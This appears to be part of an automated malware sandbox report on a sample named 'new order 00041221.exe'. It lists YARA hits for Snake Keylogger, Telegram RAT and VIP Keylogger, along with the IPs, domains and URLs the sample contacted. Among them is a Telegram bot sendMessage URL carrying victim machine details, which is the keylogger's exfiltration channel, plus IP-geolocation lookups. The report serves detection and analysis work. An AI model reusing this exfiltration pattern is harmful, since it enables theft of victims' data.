Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
203.124.44.4
 mail.moonbrosurgical.com Pakistan
7590 COMSATSCommissiononScienceandTechnologyforPK false
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
mail.moonbrosurgical.com 203.124.44.4 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
15.164.165.52.in-addr.arpa unknown unknown
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown